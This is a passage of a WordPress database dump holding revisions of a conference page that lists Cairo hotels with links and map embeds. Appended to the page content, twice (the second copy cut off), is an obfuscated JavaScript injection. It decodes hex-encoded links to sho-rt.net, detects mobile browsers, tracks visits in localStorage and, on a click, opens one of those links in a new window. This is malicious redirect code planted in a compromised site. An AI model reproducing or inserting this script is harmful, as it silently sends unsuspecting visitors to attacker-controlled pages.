primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-01-25 07:10:13','2023-01-25 07:10:13','',2685,'https://gsw2023.com/?p=3652',0,'revision','',0),
(3653,1,'2023-01-25 07:21:21','2023-01-25 07:21:21','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p>&nbsp;<br />\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe><br />\n<a href=\"https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17\" target=\"_blank\" rel=\"noopener\">https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17</a>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 